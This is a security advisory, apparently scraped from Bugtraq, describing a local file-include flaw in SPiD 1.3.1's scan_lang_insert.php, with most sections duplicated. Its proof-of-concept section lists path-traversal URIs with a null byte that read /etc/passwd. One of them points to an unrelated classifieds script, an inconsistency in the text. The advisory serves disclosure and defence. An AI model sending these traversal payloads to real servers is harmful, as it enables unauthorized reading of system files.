SPiD Scan_Lang_Insert.PHP Local File Include Vulnerability
BID:16822
Info
SPiD Scan_Lang_Insert.PHP Local File Include Vulnerability
| Bugtraq ID: | 16822 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 25 2006 12:00AM |
| Updated: | Mar 01 2006 01:26AM |
| Credit: | NSA Group is credited with the discovery of this vulnerability. |
| Vulnerable: |
SPiD SPiD 1.3.1 |
| Not Vulnerable: | |
Discussion
SPiD Scan_Lang_Insert.PHP Local File Include Vulnerability
SPiD is prone to a local file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of this issue may facilitate the unauthorized viewing of files and execution of local scripts.
SPiD is prone to a local file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of this issue may facilitate the unauthorized viewing of files and execution of local scripts.
Exploit / POC
SPiD Scan_Lang_Insert.PHP Local File Include Vulnerability
This issue may be exploited using a web client.
The following proof of concept URI is available:
http://www.example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00
This issue may be exploited using a web client.
The following proof of concept URI is available:
http://www.example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00
http://www.example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00
Solution / Fix
SPiD Scan_Lang_Insert.PHP Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
SPiD Scan_Lang_Insert.PHP Local File Include Vulnerability
References:
References:
- NSAG-?201-25.02.2006 (NSA Group)
- SPid Homepage (SPiD)
- =?windows-1251?Q?NSA_Group_Security_Advisory_NSAG-=B9201-25.02.2006_Vulnerabilit (NSA Group
)